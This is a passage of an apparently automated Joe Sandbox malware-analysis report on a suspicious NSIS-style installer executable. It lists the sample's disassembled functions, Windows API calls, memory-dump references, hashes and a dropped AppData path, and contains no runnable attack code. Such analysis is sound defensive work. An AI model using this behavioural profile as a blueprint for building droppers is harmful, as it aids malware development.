                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                          Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                          Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                          Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                          • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                          • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                          • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                          Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                          Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                          • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                          • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                          • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                          Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                          Function 004058AA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID:
                                                          • API String ID: 587946157-0
                                                          • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                          • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                          • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                          • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                          Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                            • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                            • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                            • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                            • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                          • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                          • Opcode Fuzzy Hash: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                          • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                          Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

                                                          Non-executed Functions

                                                          Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                          • GetClientRect.USER32(?,?), ref: 004054CF
                                                          • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                          • ShowWindow.USER32(?,00000008), ref: 00405572
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                            • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                          • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                          • ShowWindow.USER32(00000000), ref: 0040561E
                                                          • ShowWindow.USER32(?,00000008), ref: 00405623
                                                          • ShowWindow.USER32(00000008), ref: 0040566D
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                          • CreatePopupMenu.USER32 ref: 004056B2
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                          • GetWindowRect.USER32(?,?), ref: 004056E6
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                          • OpenClipboard.USER32(00000000), ref: 00405747
                                                          • EmptyClipboard.USER32 ref: 0040574D
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                          • CloseClipboard.USER32 ref: 004057A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {
                                                          • API String ID: 590372296-366298937
                                                          • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                          • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                          • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                          • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                          Function 004046E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                          • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                            • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                            • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                            • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                            • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                            • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                          • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                            • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                            • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                            • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                          • API String ID: 2624150263-251418098
                                                          • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                          • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                          • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                          • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                          Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                          • String ID:
                                                          • API String ID: 4227406936-0
                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
